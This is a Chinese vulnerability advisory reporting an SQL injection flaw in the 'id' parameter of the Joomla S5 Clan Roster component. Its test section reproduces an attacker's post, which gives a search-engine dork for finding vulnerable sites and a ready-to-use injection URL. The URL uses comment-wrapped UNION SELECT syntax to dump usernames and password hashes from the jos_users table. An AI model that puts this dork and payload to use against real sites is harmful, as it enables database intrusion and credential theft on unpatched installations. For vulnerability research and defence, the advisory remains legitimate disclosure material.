发布日期:2013-05-13
更新日期:2013-05-22
受影响系统:
Joomla! S5 Clan Roster
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 59993
Joomla! S5 Clan Roster组件可以将游戏家族成员组织分类。
Joomla! S5 Clan Roster组件在com_s5clanroster(index.php, id param)中存在SQL注入漏洞,成功利用此漏洞可导致未授权数据库操作。
<*来源:AtT4CKxT3rR0r1ST
链接:
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Joomla Component com_s5clanroster Sql Injection Vulnerability
==============================================================
####################################################################
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
.:. Dork : inurl:"com_s5clanroster"
.:. Script :
####################################################################
===[ Exploit ]===
Sql Injection:
==============
server/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=1[sql]
server/index.php?option=com_s5clanroster&view=s5clanroster&layout=category&task=category&id=-null'+/*!50000UnIoN*/+/*!50000SeLeCt*/group_concat(username,0x3a,password),222+from+jos_users-- -
####################################################################
建议:
--------------------------------------------------------------------------------
厂商补丁:
Joomla!
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: